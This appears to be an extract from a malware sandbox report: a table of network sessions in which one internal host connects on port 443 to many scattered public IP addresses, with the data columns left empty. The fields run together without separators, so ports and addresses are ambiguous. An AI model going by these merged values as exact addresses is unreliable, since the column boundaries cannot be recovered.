                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11346192.168.2.1351780148.254.169.173443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11347192.168.2.133484678.156.18.149443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11348192.168.2.1335834122.248.55.85443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11349192.168.2.133461242.121.233.57443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11350192.168.2.134241666.29.158.198443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11351192.168.2.1348312204.46.91.36443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11352192.168.2.1336710196.151.87.79443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11353192.168.2.1336894150.50.151.56443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11354192.168.2.1346614201.201.43.60443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11355192.168.2.13395328.139.136.25443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11356192.168.2.1355470140.210.125.66443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11357192.168.2.134994271.101.223.215443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11358192.168.2.1351874188.116.212.216443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11359192.168.2.1360440173.202.166.226443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11360192.168.2.134143684.232.24.237443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11361192.168.2.133854288.219.101.191443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11362192.168.2.13482241.209.116.8443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11363192.168.2.1336822114.31.120.54443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11364192.168.2.134059290.143.228.209443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11365192.168.2.136003420.37.71.215443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11366192.168.2.134313647.14.102.206443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11367192.168.2.1341354212.116.160.157443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11368192.168.2.135752820.210.114.199443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11369192.168.2.1338300139.125.52.162443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11370192.168.2.1340270131.245.148.188443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11371192.168.2.135602663.76.124.194443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11372192.168.2.1335818202.176.14.154443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11373192.168.2.1344850206.16.243.156443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11374192.168.2.1348084159.153.92.190443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11375192.168.2.135931661.59.100.150443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11376192.168.2.1333796140.247.102.58443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11377192.168.2.13486701.244.191.72443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11378192.168.2.134190041.51.13.26443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11379192.168.2.1356034208.137.53.180443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11380192.168.2.1343706111.64.1.80443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11381192.168.2.1349948158.56.96.3443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11382192.168.2.1339676118.216.152.214443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11383192.168.2.134402471.159.232.46443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11384192.168.2.1341040223.154.212.199443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11385192.168.2.135474694.96.232.166443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11386192.168.2.1354784146.162.219.196443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11387192.168.2.1350398190.67.24.143443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11388192.168.2.1347688112.99.107.27443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11389192.168.2.1337890135.221.70.133443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11390192.168.2.134948658.9.240.144443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11391192.168.2.1343134103.243.122.65443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11392192.168.2.1352352201.52.97.158443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11393192.168.2.1351160124.111.84.196443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11394192.168.2.134902439.191.128.188443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11395192.168.2.135801440.184.87.197443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11396192.168.2.134457084.113.155.215443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11397192.168.2.1342392196.65.108.105443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11398192.168.2.135311284.170.90.75443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11399192.168.2.1332966178.58.215.99443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11400192.168.2.134473663.243.139.107443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11401192.168.2.1353594158.80.43.59443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11402192.168.2.1342778209.164.25.60443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11403192.168.2.1343424197.82.87.191443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11404192.168.2.1336504107.74.71.134443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11405192.168.2.135662095.56.137.222443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11406192.168.2.1356736182.83.116.34443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11407192.168.2.1357278222.214.90.219443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11408192.168.2.135600849.76.11.132443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11409192.168.2.1358812199.111.111.86443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11410192.168.2.1334226125.162.45.168443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11411192.168.2.1344576220.161.73.223443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11412192.168.2.134175685.52.203.28443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11413192.168.2.1350538131.110.156.211443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11414192.168.2.1360714105.208.48.189443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11415192.168.2.1337636185.97.101.23443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11416192.168.2.1339414201.129.8.230443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11417192.168.2.135981695.12.104.208443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11418192.168.2.1350518162.255.19.177443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11419192.168.2.1355132139.193.26.74443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11420192.168.2.134514077.100.48.206443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11421192.168.2.134154073.145.113.243443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11422192.168.2.134264820.196.48.75443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11423192.168.2.1343044119.164.7.180443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11424192.168.2.1334272181.160.149.238443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11425192.168.2.1344956190.206.65.241443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11426192.168.2.133329689.8.249.101443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11427192.168.2.13550481.242.254.190443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11428192.168.2.1352718107.143.50.145443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11429192.168.2.136055694.247.1.95443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11430192.168.2.135934487.43.158.120443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11431192.168.2.1360020148.188.71.246443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11432192.168.2.1356452128.185.223.90443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11433192.168.2.1334120132.100.230.137443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11434192.168.2.1343566220.240.80.156443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11435192.168.2.134490220.25.27.191443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11436192.168.2.135966044.124.226.167443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11437192.168.2.1335474188.89.248.196443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11438192.168.2.1338098131.32.38.210443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11439192.168.2.1348438185.141.32.197443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11440192.168.2.134168417.226.166.63443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11441192.168.2.134746091.178.32.45443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11442192.168.2.134024072.138.134.119443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11443192.168.2.1343528163.185.93.226443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11444192.168.2.134905059.245.196.163443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11445192.168.2.1335620101.250.132.207443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11446192.168.2.135390831.167.85.92443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11447192.168.2.135012664.87.223.222443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11448192.168.2.1351308175.115.120.34443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11449192.168.2.1340426203.44.131.255443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11450192.168.2.1344222216.212.193.40443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11451192.168.2.1339108151.173.206.44443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11452192.168.2.134523677.80.212.152443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11453192.168.2.1340088154.244.207.125443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11454192.168.2.1341028120.90.45.138443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11455192.168.2.1347304208.64.131.95443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11456192.168.2.1339970111.91.200.23443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11457192.168.2.1332804178.114.113.167443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11458192.168.2.1338914184.165.80.92443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11459192.168.2.1347378162.171.182.132443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11460192.168.2.1333266208.87.107.121443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11461192.168.2.1345722151.93.27.238443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11462192.168.2.133597499.212.75.195443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11463192.168.2.135086892.86.86.68443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11464192.168.2.134243446.134.75.105443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11465192.168.2.13367144.149.73.194443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11466192.168.2.1353044171.90.156.148443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11467192.168.2.1356990163.104.171.123443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11468192.168.2.1350704110.246.202.166443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11469192.168.2.1354996113.52.156.236443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11470192.168.2.1349412218.188.63.143443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11471192.168.2.135848232.168.66.212443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11472192.168.2.1339936116.125.84.137443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11473192.168.2.1350374107.40.179.167443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11474192.168.2.135335297.67.167.89443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11475192.168.2.1357572109.168.116.90443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11476192.168.2.1334368119.108.238.74443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11477192.168.2.1343918198.36.46.54443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11478192.168.2.1352268167.31.27.207443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11479192.168.2.1340164121.140.85.220443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11480192.168.2.134679273.224.152.22443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11481192.168.2.1360536183.127.60.8443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11482192.168.2.1336086169.28.38.192443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11483192.168.2.1333924128.33.218.223443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11484192.168.2.1336792211.136.54.175443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11485192.168.2.1343762135.64.181.40443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11486192.168.2.1338318148.1.20.72443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11487192.168.2.135980899.96.89.158443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11488192.168.2.1336266145.216.107.80443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11489192.168.2.1343000170.33.240.92443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11490192.168.2.1339736134.21.168.153443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11491192.168.2.1355454144.148.5.118443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11492192.168.2.13377925.176.168.225443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11493192.168.2.133761475.96.206.28443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11494192.168.2.134729886.5.133.216443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11495192.168.2.1332816107.158.240.43443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11496192.168.2.134864245.118.3.239443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11497192.168.2.1335818142.103.16.147443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11498192.168.2.133468679.112.182.229443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11499192.168.2.1347320161.76.59.38443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11500192.168.2.1352008204.249.73.36443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11501192.168.2.1357986189.188.155.211443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11502192.168.2.133396074.143.248.133443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11503192.168.2.135943849.150.74.224443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11504192.168.2.1349126134.73.75.61443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11505192.168.2.1344156131.12.247.9443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11506192.168.2.13508024.48.219.91443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11507192.168.2.1341080194.190.10.210443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11508192.168.2.1359480191.155.190.134443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11509192.168.2.1354984142.190.31.209443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11510192.168.2.1347304113.117.87.50443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11511192.168.2.1337704188.130.22.128443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11512192.168.2.134872067.117.236.216443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11513192.168.2.135627289.70.74.225443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11514192.168.2.1336212110.28.45.193443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11515192.168.2.135030261.8.83.112443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11516192.168.2.1339508179.170.10.188443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11517192.168.2.1344316207.168.205.237443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11518192.168.2.1342386151.100.68.189443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11519192.168.2.1335252197.232.30.63443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11520192.168.2.1335254113.149.174.159443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11521192.168.2.135006043.119.179.172443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11522192.168.2.1340792221.123.66.161443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11523192.168.2.134325062.51.42.218443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11524192.168.2.1346114185.26.171.94443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11525192.168.2.135568636.206.101.199443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11526192.168.2.1333108146.180.240.80443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11527192.168.2.133832434.178.146.41443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11528192.168.2.1337198210.105.19.167443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11529192.168.2.1334124176.61.19.162443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11530192.168.2.1347954216.74.203.212443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11531192.168.2.133663245.154.183.188443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11532192.168.2.135340277.213.230.146443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11533192.168.2.133896692.57.107.167443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11534192.168.2.1357522156.135.65.156443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11535192.168.2.134976439.30.13.223443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11536192.168.2.1334004149.139.1.26443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11537192.168.2.133883673.102.61.58443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11538192.168.2.1340066194.12.222.46443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11539192.168.2.134750279.221.78.96443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11540192.168.2.1334084196.117.118.43443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11541192.168.2.1356398182.100.153.76443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11542192.168.2.1356644200.204.224.14443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11543192.168.2.1336806168.220.58.237443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11544192.168.2.133432685.198.234.52443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11545192.168.2.1350262118.216.54.121443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11546192.168.2.1356130157.31.117.241443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11547192.168.2.1344606160.144.4.70443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11548192.168.2.134370664.249.144.173443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11549192.168.2.1360678137.163.40.2443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11550192.168.2.1349826192.145.197.13443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11551192.168.2.1350928186.244.247.120443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11552192.168.2.1343298202.21.113.212443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11553192.168.2.1334396200.66.85.162443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11554192.168.2.1357658108.56.246.184443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11555192.168.2.1352590218.146.61.234443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11556192.168.2.1355700172.101.107.157443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11557192.168.2.1347808121.192.202.221443
                                                  TimestampBytes transferredDirectionData


